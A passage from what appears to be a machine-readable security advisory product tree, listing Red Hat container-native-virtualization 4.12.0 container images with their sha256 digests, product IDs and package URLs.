"pkg:oci/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.12.0-58", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.12.0-769", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.12.0-31", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.12.0-182", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.12.0-64", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.12.0-40", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.12.0-32", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_id: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.12.0-71", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.12.0-72", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_id: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_id: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportproxy&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_id: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", product_identification_helper: { purl: "pkg:oci/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-exportserver&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_id: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_id: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.12.0-10", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_id: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", product_identification_helper: { purl: 